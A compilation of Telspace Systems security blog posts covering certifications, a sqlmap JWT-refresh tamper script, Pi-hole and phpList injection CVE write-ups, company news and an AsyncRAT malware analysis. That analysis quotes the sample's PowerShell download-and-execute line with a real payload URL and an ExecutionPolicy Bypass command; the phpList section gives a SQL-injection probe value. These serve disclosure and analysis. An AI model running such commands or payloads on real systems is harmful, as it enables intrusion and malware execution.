It is absolutely normal to feel a bit rubbish after failing, but this is where your passion enters the equation again. Where you refuse to lose! Give yourself some time to accept failure, then pick yourself up and figure out your game-plan. All part of what we learnt during the internship process with Telspace Systems initially.

It is not possible to be good at everything, and it takes time and effort to learn any skill - thank you Dino Covotsos and Manuel Corregedor for encouraging me not to shy away from my weaknesses - keep learning and practicing.

FAILURE TLDR:

  • Failing sucks, but figure out where you need to improve.
  • Keep at it! 

Passing


Nothing on earth could compare to the feeling you get when you open the email from Offensive Security and see it starts with "We are happy to inform you...".

The hours of work, the dedication, the proverbial 'blood, sweat and tears' - are well worth it.

PASSING TLDR:

  • Passing is AWESOME, but never stop learning.
  • Keep at it!
Telspace Systems have given me a wonderful opportunity, which I am incredibly grateful for. I was delighted to be one of the analysts involved in our current Internship program, and to be able to pass some of my knowledge on to those hungry to learn.

Thank you to every single person who has been part of my journey. To those who have taught me, to those who have underestimated me and said I did not deserve this (because you made me fight for it harder), but mostly to those who understand that to achieve great things takes immense hard work and lead by fantastic example.

Post by Amy Manià

COVID-19 – Closed Offices

At Telspace we put our employees, clients, community and country first in everything we do. In line with this, we have decided to close our physical offices and all our staff will be working remotely. By doing so, we can hopefully reduce the risk of COVID-19 further spreading. This post outlines why we are doing this and how this will affect our day to day operations and community engagements. 


Why?


Surely this is an overreaction given we are a company with fewer than 100 people? Aren’t we just spreading more fear / panic? No and no. Won’t this result in a negative financial impact on Telspace? Potentially yes, due to factors outside of our control, but there are more important things happening right now, and we will always ensure that our services meet the highest quality standards our clients have come to expect.


We want to be proactive in protecting ourselves and everyone else, and we therefore call on companies in our industry, and any companies outside it that can do the same, to follow suit; prevention is better than cure, as the saying goes.

Telspace Conference 2020


Our client only conference was scheduled to take place on the 31st of March and we were expecting a large number of attendees. We are excited to inform you that our conference will still be going ahead, albeit in a digital format as follows:


  • Our talks will now be given virtually and will be accessible to all our clients to log onto / participate in. 
  • All swag / gifts that were going to be given out at the conference will instead be kept and distributed to clients once the pandemic has been resolved.

Key Account Managers


We love the personal touch that comes from meeting our clients face to face, but with COVID-19 the fewer in-person meetings, the safer. As such, all our sales / key account managers will now be required to conduct meetings / catch-ups virtually via Google Hangouts, Skype, Zoom etc. For more sensitive conversations / discussions, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the meetings.


Security Assessments / Penetration Tests


The good news is that we are prepared for a remote working scenario and therefore will still be able to provide you with uninterrupted services of the highest quality. All of our assessments can be conducted remotely, provided we are given VPN access to the client’s environment. Alternatively, we can provide clients with our own TelspaceConnect Boxes: essentially a box that allows us to connect remotely to a client’s network to conduct the assessment. Just plug it into the network where it’s required and we will do the rest.


For more specialised assessments, we are happy to work with clients to find the best way to conduct the assessment. 


Report presentations will be done virtually via Google Hangouts, Skype, Zoom etc.  For more sensitive presentations, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the presentations.  


Training


All of our training can be given virtually. To assist students with any issues they may have with the practical aspects of the training, a remote connection to the student’s computer / host would be required.


Conclusion


We would like to wish everyone the very best during this difficult time and we hope that you will be safe. We are confident that if we all work together proactively in preventing the spread of COVID-19, we will collectively be able to defeat it.


Dino, Manny and Tim (Telspace Management Team)

Bypassing refresh tokens with SQLMap’s tamper scripts





In this blog post, I will take you through how to use SQLMap’s “--tamper” parameter to work around the token-expiry limitation of a web application that uses JWT tokens.

Web applications that use JWT tokens typically make the token expire after a certain period of time. Once it has expired, you receive a 401 error from the application, meaning that you no longer have the correct privileges to use that specific application or endpoint.

During a recent assessment, I came across a web application that used JWT tokens for its authentication process. After token expiry, a request always has to be sent to the application to re-authorise access and obtain a new token.

When using SQLMap to test the application for potential SQL injection vulnerabilities, this became an issue: once the token expired, the application required re-authentication and issued a new token, while the requests SQLMap kept sending still carried the old one and therefore resulted in a 401 error.

I came up with a solution to this problem when using SQLMap: request a new token and then rewrite the Authorization header before each request, which bypasses the issue.

Below is the example of how this was successfully achieved.

First the request for a new token was sent to the application:

As can be seen below, this request then responded with JSON containing an “access_token”, which could then be used in the next request:

For the next step, I then used Python to recreate the POST request in a script. In the screenshot below, you can see the code that was used for the POST request:


In addition to the above code, the authorisation header should be rewritten with new information before every request that is sent by SQLMap, as can be seen below:

The full tamper script should then look like the code in the screenshot below:
Lastly, in the screenshot below you can see the command for executing the tamper script against a target using SQLMap (sqlmap -u https://url.com/ --tamper bypass.py):


At this point, requests are sent correctly, the token is refreshed when needed and you will no longer receive a 401 error.
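The tamper script in the screenshots is not reproduced here; the following is an added example of the same idea, written for this post and not the author’s file. It assumes a placeholder token endpoint (TOKEN_URL) that accepts JSON credentials and answers with an “access_token” field, as the post describes, and it goes one step further than refreshing on every request: it reads the JWT’s exp claim (without verifying the token, since the client is only scheduling its own refresh) and only calls the token endpoint when the cached token is missing or about to expire, so the authentication service is not hammered once per payload. The fake-JWT builder exists only so the script can be exercised offline.

```python
"""Constructed sqlmap tamper script: keep the Authorization header carrying a live JWT."""
import base64
import json
import time
import urllib.request
from typing import Callable, Dict, Optional

# sqlmap provides lib.core.enums when it loads a tamper script; fall back so this also runs stand-alone.
try:
    from lib.core.enums import PRIORITY  # type: ignore
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0

# Assumed, placeholder values for the application under test (not from the post).
TOKEN_URL = "https://target.example/api/auth/token"
CREDENTIALS = {"username": "tester", "password": "REPLACE_ME"}
REFRESH_MARGIN = 30          # seconds before the exp claim at which we fetch a new token

_cache: Dict[str, object] = {"token": None, "exp": 0}


def jwt_expiry(token: str) -> Optional[int]:
    """Return the exp claim of a JWT without verifying it; None if the token has no usable exp."""
    try:
        payload_b64 = token.split(".")[1]
        payload_b64 += "=" * (-len(payload_b64) % 4)          # restore stripped base64url padding
        claims = json.loads(base64.urlsafe_b64decode(payload_b64))
        return int(claims["exp"])
    except (IndexError, ValueError, KeyError, TypeError):
        return None


def _http_fetch_token() -> str:
    """Default fetcher: POST the credentials as JSON and read access_token from the JSON reply."""
    req = urllib.request.Request(
        TOKEN_URL,
        data=json.dumps(CREDENTIALS).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)["access_token"]


def current_token(fetch: Callable[[], str] = _http_fetch_token, now: Optional[float] = None) -> str:
    """Return a cached token, fetching a fresh one only when it is missing or about to expire."""
    now = time.time() if now is None else now
    if _cache["token"] is None or now >= _cache["exp"] - REFRESH_MARGIN:
        token = fetch()
        exp = jwt_expiry(token)
        _cache["token"] = token
        _cache["exp"] = exp if exp is not None else 0   # opaque token: refresh on every request
    return _cache["token"]


def make_unsigned_test_jwt(exp: int) -> str:
    """Constructed, unsigned JWT (alg none, empty signature) for offline testing only."""
    def seg(obj: dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return seg({"alg": "none", "typ": "JWT"}) + "." + seg({"sub": "tester", "exp": exp}) + "."


def dependencies() -> None:
    pass


def tamper(payload, **kwargs):
    """sqlmap hook: the payload is returned untouched; only the Authorization header is rewritten."""
    headers = kwargs.get("headers", {})
    headers["Authorization"] = "Bearer " + current_token()
    return payload


if __name__ == "__main__":
    # Offline demo: seed the cache with a constructed token, then show the header sqlmap would send.
    demo_token = make_unsigned_test_jwt(int(time.time()) + 300)
    current_token(fetch=lambda: demo_token)
    hdrs: Dict[str, str] = {}
    tamper("1", headers=hdrs)
    print(hdrs["Authorization"][:40] + "...")
```

Saved as bypass.py, the file is loaded by the command shown above. The headers dictionary sqlmap passes to tamper functions is the live request header set, which is why assigning to it is enough; tamper scripts that add headers in sqlmap’s own repository use the same kwargs.get("headers") pattern.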
I hope you have found this information to be of value and that it will assist you in future penetration tests.

- Blog post by Motaz of Telspace Systems.



{Certification Review} - OSWE - Staff Review

Recently, Offensive-Security released an online version of their certification called “Offensive Security Web Expert” aka OSWE. After having already experienced and successfully obtaining several other certifications from Offensive Security such as OSCP and OSCE, I was curious and intrigued to give the OSWE course a try as well.

I decided to choose the 2-month package option for the course called “Advanced Web Attacks and Exploitation” and due to other commitments I was able to request and was granted a minor 15 day extension.
After watching the videos and reading through the course material, I was very impressed by the content of the course, as it contained detailed information and analysis on certain in-depth attacks.

The course followed a white-box testing approach which was based on source code review, by reading the code of the web application in order to find and exploit potential vulnerabilities.

The course material included several labs with web application software installed on them and by following the content provided in the course material, exploiting the machines was relatively easy.

Before embarking on this course, I would recommend that you have a good understanding of the following skills:


1. Python scripting language:


The course will require you to have a solid understanding of, and experience with, Python scripting, as it is used for automating the process of exploiting vulnerabilities.


2. Other programming languages:


It is also very important to have basic knowledge and understanding of other programming languages such as C#, JavaScript and Java.


3. Prior experience with web application attacks:


Prior experience with web application attacks will also be very advantageous as you will be required to have strong knowledge and understanding of common modern web attacks. Personally, I would also highly recommend reading the book titled “Web Application Hacker’s Handbook”  beforehand as its content will be very helpful during the course and thereafter.


4. Source code review:


One of the outcomes that this course will teach you is how to do Whitebox testing on web applications by reviewing and understanding the code of the application. Therefore, prior experience in doing source code review on web applications will be advantageous.


5. Web development experience:


Having prior experience with web development and the workings of web applications will also assist with successfully completing this course.

Course Overview:


After receiving the course materials, I began reading the book, watching videos and solving the exercises and milestones. 

The first few chapters of the course were relatively basic, but from Chapter 4 onwards it became far more advanced. Personally, it was at this point that it really became fun, as the course delved deeper into advanced techniques and attack types.

Offensive Security recommends that you try to solve the exercises and milestones as you progress through the chapters, to ensure that you get a better grasp and understanding of the material and as proof that you have understood everything in that particular chapter.

Listed below are the pros and cons to consider when deciding whether to take this course:


PROS:

  • Great for learning and advancing white box testing and source code review skills.
  • The course covers advanced real-world vulnerabilities such as deserialization attacks and advanced techniques.
  • The course covers a wide range of vulnerabilities and exploits, including medium, high and critical risk.

CONS:

  • Although the course covers many different attack types, there are a few that are not covered, for example XXE, SSRF, CSRF and SSTI.
  • More exercise work and milestones would be advantageous to learners.

The lab review:


The lab consisted of 5 machines which contained the web applications discussed in the course material. Therefore, by going through the course material comprehensively and successfully completing the course exercises and milestones, you should be able to successfully execute the necessary attacks and exploitation paths.

Personally, I would recommend practicing as much as possible before moving onto the exam, as this will help increase your skills and confidence. 

The exam review:


The OSWE exam is 48 hours long, with an additional 24 hours for writing your step-by-step report. As with all exams, I would recommend that you get enough sleep to ensure that you are well rested and able to perform at your peak.
During the exam, I had not rested enough and it started to affect my performance, therefore my recommendation is that if you start feeling tired, go sleep for a bit and then resume as this will help you to think clearer.

A few other suggestions from my experience is to remember to get up and take a walk every few hours and don’t forget to take screenshots as you solve the challenges in the exam.

Lastly, try not to stress too much about the exam, try to think of it as a challenge that you are trying to solve, rather than an exam itself.

Important material to read before undertaking this course:


Below is a list of content material that I would recommend that you read and work through before you undertake the OSWE course:

Summary:


OSWE is a very good course for people looking to improve their source code review skills as well as learning how to detect bugs and vulnerabilities by searching for them in the code itself. I would recommend that you book your exam not long after your lab time ends, so that the information you have learned will be fresh and ready to be used. Overall I enjoyed my OSWE experience and would therefore recommend it to others.

- Blog post by Motaz of Telspace Systems

Pi-hole Code Injection – CVE-2020-14971– Story Time

A while ago, we had an internal discussion around people working from home and the technologies/products that could be implemented and/or bought to protect home users. This was due to the implementation of the nationwide lockdown which resulted in companies being forced to change their approach entirely to having employees work from home. 


During this discussion the Pi-hole was mentioned. Pi-hole is a very popular option for the more “tech savvy” home user and generally, anyone that’s tired of being spammed with random adverts on every website. You can find more information about it here https://github.com/pi-hole/pi-hole/.

Since I already had a Pi-hole installed, I decided to take a look at this beautiful piece of ad blocking software in more detail, specifically reviewing the code and logic of the application. Because it’s open source and freely available, this was easily accomplished by downloading and installing the latest Pi-hole (v5.0 at the time).


It’s worth mentioning that a lot of vulnerabilities had already been found in this software; some overlapped with issues I had found, particularly during April and May, which were rightfully credited to the first people who reported them. With that being said, the Pi-hole is a popular target for researchers and adds a lot of value to people’s home and small office environments, so the more findings and fixes the better. I also wanted to focus on the latest version because of this.


Initially, I found a few critical security vulnerabilities, but many had already been found and fixed, and others ultimately required local shell access in some form; some functionality had also been changed over time, which resolved those particular RCE issues too. I therefore looked at a few other vectors and decided to focus on one specific attack vector that looked promising.


Backup Functions:


Settings.php has lots of functionality, part of which allows users to back up and restore (export and import) the configuration of the Pi-hole as a limited set of files (the Teleporter tab).



This was interesting to me because when you export files, they are compressed in tar.gz format and saved. After decompressing the archive and systematically reviewing each file it contained, I found several files that would have been useful and easy wins for RCE, particularly if no whitelisting or sanitising was taking place. However, those particular files are not restored if you modify them, re-compress the archive and upload it to restore the backup.



In this instance, though, the affected files I found were the dnsmasq.d configuration files and the adlist.json file. The dnsmasq.d/04-pi-hole-static-dhcp.conf file defines static DHCP leases, each linking a MAC address, IP address and hostname.


I first modified the dnsmasq.d configuration file, adding my own code in the host parameter. I then re-compressed the archive accordingly and imported it back in via Teleporter:


Upon browsing to the static DHCP leases section of the Pi-hole web interface, I could see my code executing correctly, i.e. I had found a code injection vulnerability.



The same then applied to adlists.json and to other parameters in other files: none of the files were being properly checked on upload, and they simply overwrote whatever was previously there, so your code executed accordingly:



Browse to host/admin/groups-adlists.php and you should get the ‘Adam popup’:




There are more examples, however it’s more of the same as what has been discussed above. I would also like to mention, that the Pi-hole is an amazing piece of software, built by people who really care for the community, please support them and donate. All the responses (especially from Adam) were really quick and things were patched exceptionally quickly.
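The root cause described above is that restored files were trusted as-is. As an added example (written for this post, not Pi-hole’s code or its actual patch), here is the kind of strict validation a restore path can apply to 04-pi-hole-static-dhcp.conf before it overwrites anything, followed by HTML escaping when the values are rendered. It assumes the dhcp-host=MAC,IP,hostname layout the post describes and restricts the hostname to a single RFC 1123 label; the sample configuration is constructed.

```python
"""Added example: validate a restored static-DHCP file, then escape what is rendered."""
import html
import ipaddress
import re
from typing import List, NamedTuple

# One DNS label under RFC 1123 host name rules: letters, digits, hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")


class StaticLease(NamedTuple):
    mac: str
    ip: str
    hostname: str


def parse_static_lease(line: str) -> StaticLease:
    """Parse one 'dhcp-host=MAC,IP,hostname' line (the layout assumed here) and reject anything else."""
    if not line.startswith("dhcp-host="):
        raise ValueError(f"unexpected directive: {line!r}")
    fields = line[len("dhcp-host="):].split(",")
    if len(fields) != 3:
        raise ValueError(f"expected MAC,IP,hostname but got {len(fields)} fields: {line!r}")
    mac, ip, hostname = (f.strip() for f in fields)
    if not MAC_RE.match(mac):
        raise ValueError(f"bad MAC address: {mac!r}")
    ipaddress.ip_address(ip)                 # raises ValueError for anything that is not an IP address
    if not LABEL_RE.match(hostname):         # markup, spaces and quotes all fail this allow-list
        raise ValueError(f"bad hostname: {hostname!r}")
    return StaticLease(mac, ip, hostname)


def validate_static_dhcp_conf(text: str) -> List[StaticLease]:
    """Validate a whole restored file; the first bad line rejects the entire restore."""
    leases: List[StaticLease] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            leases.append(parse_static_lease(line))
        except ValueError as exc:
            raise ValueError(f"line {lineno}: {exc}") from None
    return leases


def check_conf(text: str) -> str:
    """Return 'ok' or the validation message, so the caller can decide whether to apply the restore."""
    try:
        validate_static_dhcp_conf(text)
        return "ok"
    except ValueError as exc:
        return str(exc)


def render_lease_row(lease: StaticLease) -> str:
    """Second layer: even validated values are HTML-escaped when rendered into the settings page."""
    cells = "".join(f"<td>{html.escape(v)}</td>" for v in lease)
    return f"<tr>{cells}</tr>"


# Constructed samples: a well-formed lease, then the same file plus a hostname carrying markup.
GOOD_CONF = "# static leases\ndhcp-host=AA:BB:CC:DD:EE:01,192.168.1.10,printer\n"
BAD_CONF = GOOD_CONF + "dhcp-host=AA:BB:CC:DD:EE:02,192.168.1.11,nas<b>x\n"

if __name__ == "__main__":
    print(check_conf(GOOD_CONF))
    print(check_conf(BAD_CONF))
    for lease in validate_static_dhcp_conf(GOOD_CONF):
        print(render_lease_row(lease))
```

Validating on import and escaping on output are independent controls: the first keeps a crafted archive from ever landing in the dnsmasq configuration, the second means a value that reaches the page by some other route still renders as text.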


You can browse all the fixes, comments and progress of patching by going here:








phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time

phpList is currently used in 73 countries and is a popular choice for sending email newsletters, marketing campaigns and announcements. It is accessible via web browsers and is Open Source (https://www.phplist.org); a paid-for version also exists as a service via https://www.phplist.com.


Given its wide use / adoption, I decided to take a look at phpList recently, in order to give back to the Open Source community. 


I would also like to give credit to phpList for responding and patching very quickly, especially to Suela at phpList. A new version of the application is now available for download.


You can browse all the fixes, comments and patching by going to the following URLs:




A walkthrough of the 2 identified vulnerabilities is given below:


1.) Code Injection via "Import administrators"


1.1) Click on "Config" then "Import administrators"


1.2) Edit a txt file to include basic headers and text (offline) as follows:


1.3) Click on "Choose File" and select the text file.


1.4) Click "Do Import"


Code Injection Triggered (not stored)


1.5) Go back to "Import administrators"

1.6) Untick "Test output:"



1.7) Click "Do Import" and you will get an import database error.

1.8) Edit the same text file and add another user as follows:

1.9) Go back to "Import administrators"

1.10) Click on "Choose File" and choose the text file.

1.11) Untick "Test output:"


1.12) Click "Do Import" and you will get more import database errors

1.13) Browse to "Subscribers" then "Subscriber Lists"


1.14) Click on the first one and you'll get a "hi" popup:


1.15) Go back and click on the second one and you'll get a cookie.


2.) Error based SQL Injection via "Import administrators"


2.1) Click on "Config" then "Import administrators"

2.2) Edit a txt file to include basic headers and text (offline) as follows


email   loginname      password


test2@test.com          "'testsql          test


2.3) Untick "Test output:"
2.4) Click on "Choose File" and choose the text file.


2.5) Click "Do Import" - you'll see the Error Based SQL injection.
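The second finding comes down to how an imported field reaches the database. As an added example (written for this post; not phpList’s code, which is PHP, and not its fix), the following reads the tab-separated import shown in step 2.2 and stores it two ways against an in-memory SQLite table: splicing the values into the SQL text, where the leading double quote and single quote in the loginname break the statement (an application that echoes that error is exactly the error-based case above), and with bound parameters, where the same value is stored verbatim. The table and sample file are constructed; the password column is kept only to mirror the import layout.

```python
"""Added example: tab-separated admin import, concatenated SQL beside parameterised SQL."""
import csv
import io
import sqlite3
from typing import List, Optional, Tuple

SCHEMA = "CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT, loginname TEXT, password TEXT)"

# Constructed import file in the header-first, tab-separated layout the post describes.
SAMPLE_IMPORT = "email\tloginname\tpassword\n" 'test2@test.com\t"\'testsql\ttest\n'


def parse_admin_import(text: str) -> List[Tuple[str, str, str]]:
    """Read the import file. QUOTE_NONE keeps a leading double quote as a literal character
    instead of letting the csv module treat it as a field quote and swallow the rest of the line."""
    reader = csv.DictReader(io.StringIO(text), delimiter="\t", quoting=csv.QUOTE_NONE)
    required = ("email", "loginname", "password")
    missing = [c for c in required if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"import file lacks columns: {missing}")
    rows: List[Tuple[str, str, str]] = []
    for lineno, row in enumerate(reader, 2):
        if any(not row.get(c) for c in required):
            raise ValueError(f"line {lineno}: empty required field")
        rows.append((row["email"], row["loginname"], row["password"]))
    return rows


def _loginnames(conn: sqlite3.Connection) -> List[str]:
    return [r[0] for r in conn.execute("SELECT loginname FROM admin ORDER BY id")]


def import_with_concatenation(text: str) -> Tuple[List[str], Optional[str]]:
    """Fragile pattern: field values are spliced into the SQL text, so a quote in loginname
    becomes part of the statement and the database answers with a syntax error.
    Returns (loginnames now stored, error message or None)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    try:
        for email, login, pw in parse_admin_import(text):
            conn.execute(
                f"INSERT INTO admin (email, loginname, password) VALUES ('{email}', '{login}', '{pw}')"
            )
    except sqlite3.Error as exc:
        return _loginnames(conn), f"{type(exc).__name__}: {exc}"
    return _loginnames(conn), None


def import_with_parameters(text: str) -> Tuple[List[str], Optional[str]]:
    """Hardened pattern: values travel as bound parameters, never through the SQL parser,
    so any character is stored exactly as supplied. (A real importer would hash the password.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    try:
        conn.executemany(
            "INSERT INTO admin (email, loginname, password) VALUES (?, ?, ?)",
            parse_admin_import(text),
        )
    except sqlite3.Error as exc:
        return _loginnames(conn), f"{type(exc).__name__}: {exc}"
    return _loginnames(conn), None


if __name__ == "__main__":
    print("concatenated:", import_with_concatenation(SAMPLE_IMPORT))
    print("parameterised:", import_with_parameters(SAMPLE_IMPORT))
```

Two things to take from the run: the concatenated version stores nothing and returns the database’s own error text, which is the message an error-based probe reads; the parameterised version stores the odd-looking loginname without complaint. Binding parameters fixes the injection; whether to also reject such a loginname is a separate validation decision, and the first finding in this post shows why fields that are later rendered in the interface need output escaping as well.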



Creative Commons - Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) - https://creativecommons.org/licenses/by-sa/4.0/

Looking back on 2019 and 2020…

Every year we look back on the previous year and reflect on what happened, our achievements, lessons learnt etc. However, last year this fell through, i.e. we did not look back on 2019, which is just as well given what happened / is happening in 2020... or maybe this is some version of the butterfly effect  Ƹ̵̡Ӝ̵̨̄Ʒ (∩╹□╹∩)

Okay okay we are being a bit dramatic here but it is 2020 and anything is possible, besides our newly acquired l33t ASCII art one liners ᕕ(⌐■_■)ᕗ, here are some of the highlights over the last 2 years.

Internships / Bootcamps

We ran two successful internships / bootcamps; this is an important part of our strategy to contribute towards developing / nurturing local information security skills in South Africa. For additional information on the two bootcamps we ran in the past two years, refer to:

From the bootcamps we ran, we ended up hiring 5 new staff members that joined our team and are now on their way to achieving great things both at Telspace and in the community (watch this space).  

Those that did not make it with us, in most cases, ended up finding jobs at other infosec companies and / or corporates, which is the exact reason we started the bootcamp: to bring more people into the industry as a whole, not just into Telspace. We also assisted those that could not find anywhere to be placed by sending their CVs to some of our customers and / or competitors. Below are some pictures of the bootcamp:

2020 Bootcamp


2019 Bootcamp

Talks and Research


Over the last two years we have given a number of talks and facilitated training both locally and internationally, below are some of the highlights:

Training - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows


We gave this training at both DEF CON China 1.0 and DEF CON 27 in Las Vegas in 2019; it was presented by Dino and Manny. It was really great to meet up with all our friends at DEF CON and make new ones; hopefully in 2021 we will all be able to meet up again!


Undercover hackers on their way to DEFCON China (no black hoody = no hacking going on here)

Epic artwork, epic venue! #HackerVibes


The actual venue where we were presenting but we totally missed the entrance and went on an adventure, thank goodness for Grifter!


Our names in lights O_O


A full house for all our classes with great interactions and learning!



Party time, and man was it a party x_X





Thanks to all the trainers, organisers, volunteers and everyone that made DEFCON China 1.0 possible <3

Training – Ethical Hacking 101

Right after China we were off to sunny Tel Aviv in Israel for BSides Tel Aviv, where we were sponsors and also gave our Ethical Hacking 101 training course. The local Israeli hacking community is really awesome, and 100% of the proceeds of our training course were given back to the local BSides TLV community.

Some cool art work on Aviv Beach


Raul (left) and Manny (right), ready to present to the community


Packed house for the kick off of BSides TLV 2019


Aaaaaaaaaaaaaaaaaaaand guess where we are now, VEGAAAAAAS!




Here we gave our Hack to Basics training for our DEF CON workshop, got to catch up with old friends, make new friends, nothing else like DEF CON Vegas!

 Students from one of our classes (the ones that wanted to be in the picture that is!).

#TheBadgeLife – we got to have them all (or at least some!).

 

Back to the Motherland

Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this, we started / established the DC2711 group in South Africa and had our first conference last year on the 5th of October 2019. The conference was completely FREE to attend (for the community) and allowed various international and local researchers to share their research, for a full list of who spoke, refer to https://www.dc2711.co.za/dc2711_Presentations.html. Attendees also got swag packs full of DC2711 goodies.

Jayson Street handing Dino the official DEF CON flag for the DC2711 Group

The official DC2711 sticker but more importantly, a coffeeeeee voucher :D

DC2711 Badges

Some official swag :D

Dino and Manny with their fun faces on :P


#DuckArmyInvasion


The core GOON team for DC2711 – thank you again!



We were also Gold Sponsors of BSides Cape Town 2019 and Amy’s talk was also accepted (this talk was first completed at DC2711)!

On our way to BSides Cape Town!!!!!


Amy Manià giving her talk “Put words in my mouth” although we all know it as the “deep throat” talk.

Amy’s talk is accessible online at https://www.youtube.com/watch?v=4R-g90lplco

Research / Dropping them 0days

In 2019 and 2020 we discovered and reported on a number of vulnerabilities, some of the main ones being:

We also released a tool called Travesty, a post-exploitation directory and file enumeration tool. It can be downloaded at https://github.com/telspacesystems/travesty.

For additional information on these and others we released / published this year refer to https://blog.telspace.co.za/ 

During DEF CON Safe Mode (DC28), Greg, Amy and Derek presented at the “War Story Bunker” event (Friday 7th August 2020): a pentesting story that caused a lot of big laughs and surprised faces. Unfortunately these sessions are not recorded for various reasons, but more information about DC28 can be found at https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html.

Amy Mania also represented Telspace during a Woven Experiences podcast with Melissa Monnig, the interview can be listened to on Spotify at:

Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.


Last but not least, our CEO and Founder (Dino Covotsos) is officially part of the DEF CON Review Board (Talks and Workshops). This is a great achievement, in particular representing South Africa at such an international level. More information can be found at: https://www.defcon.org/html/defcon-27/dc-27-cfp-review-board.html

In closing, we would like to thank everyone who made our 2019/2020 so amazing: a huge thank you to our staff, clients, employees, friends and, most importantly, the local and international Information Security community.

We wish you all the best and a prosperous 2021.

Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks



Amy Manià to Appear at The Boston Security Meetup in April 2021

 

SOUTH AFRICA, JOHANNESBURG – March 17 2021 – Telspace Systems, a provider of vendor-independent Information / Cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fakes and Voice Cloning at the prestigious Boston Security Meetup in Cambridge, MA, in mid-April (date not yet finalised). The Meetup is a self-described “safe place” for InfoSec people to come meet like-minded people, share “cool ideas,” and discuss real issues.

 

The Boston area has one of the most diverse information security ecosystems in the world, and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights on helping businesses avoid falling victim to cyber-attacks and deep fakes, and on how to keep sensitive information safe.

 

“Telspace underscores its commitment to protecting our customers’ financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. “We see prevention as a vital aspect, including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs).”

 

“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”

 

Ms. Manià’s body of research, entitled "Put Words In My Mouth" may be explored at the-munx.com. This links to one of her podcast appearances, a whitepaper, and recorded conference talks.

 

To learn more about Telspace Systems, please visit https://www.telspace.com/

 

# # #

About Telspace Systems

Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including government, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resources, and ISPs. To learn more, please visit Telspace Systems and follow us on LinkedIn, Facebook, and Twitter.


Media Contact for Telspace Systems:

Media Team

Tel: +27 10 590 6163

Email: services@telspace.com

 

Reverse Engineering AsyncRat Payload


As part of some current research, I decided to analyse malicious samples in VBS and PS1 formats to understand what obfuscation techniques APTs and other malicious actors are using. This led me to discover AsyncRAT, which I reverse engineered, and I wanted to share my experiences / findings with the community.

AsyncRAT is a remote access / administration tool used to control computers remotely. However, Chinese APT groups have been observed using it to perform actions such as stealing personal information or sensitive details.

The sample that I used can be found at this link (uploaded on the 12th of July 2021): https://bazaar.abuse.ch/sample/ea477346ddead4bd4cb67cf81ca9e22f9bc6ebd57b24540e44abdecb7a3e539e/

This is a payload found in the wild that uses multiple obfuscation and file manipulation techniques, with the end goal of downloading AsyncRAT for remote control.

The sample being analysed contains a VBS payload, the hashes can be seen in screenshot 1.1 below:

1.1

The contents of file.vbs are PowerShell commands obfuscated through techniques such as string replacement and splitting, in addition to file downloads, as shown in screenshot 1.2.

 

1.2

The VBS payload uses Wscript to run the command “powershell -Command (New-Object Net.WebClient.DownloadString(''https://bit.ly/3wylsze'')| IEX”, which downloads the contents of the URL https://bit.ly/3wylsze and executes them in memory.

By browsing to this URL, you get redirected to https://biplabbiprodas.com/wp-content/themes/jackryan/languages/LzWZ0w70pWJ95p9s.jpg which is supposed to be a JPG image but it is not loading as shown in screenshot 1.3.

1.3

By downloading and inspecting the “picture” we realise it is PowerShell code (shown in 1.4).

1.4

The PowerShell executed in memory downloads multiple files, replaces and concatenates strings, and performs further execution in memory.

At the beginning of the script a number of directories are created recursively under C:\ProgramData\Microsoft Arts\Start, as shown in the first highlight of screenshot 1.5.

Further into the script, three path variables are set:

  • C:\ProgramData\Microsoft Arts\Start\
  • C:\Users\Public\
  • C:\Users\Public\

The paths are obfuscated with random strings inserted into them, which the script strips out again with replace calls, as shown in the second highlight of 1.5.

Next, the script downloads three files into the above-mentioned locations respectively, as a .lnk, a .bat and a .ps1, and executes the .lnk file.


1.5

The .lnk file is a shortcut that executes the .bat file from the second location, as shown in 1.6.

1.6

The .bat file runs mshta with a vbscript:Execute argument on the command line, which in turn uses Wscript to run a PowerShell command, as shown in screenshot 1.7.


1.7

Once de-obfuscated, that PowerShell command runs the .ps1 file downloaded earlier, passing -ExecutionPolicy Bypass so that the script execution policy does not block it:

powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1

The .ps1 script contains a short sleep command, two sets of shellcode and an assembly load, highlighted in screenshot 1.8.

1.8

Each shellcode string is obfuscated with a fixed junk pattern that stands in for the character 0; a simple find and replace restores the original shellcode strings. Because the shellcodes are stored as strings, the script calls a helper function to convert them to bytes.

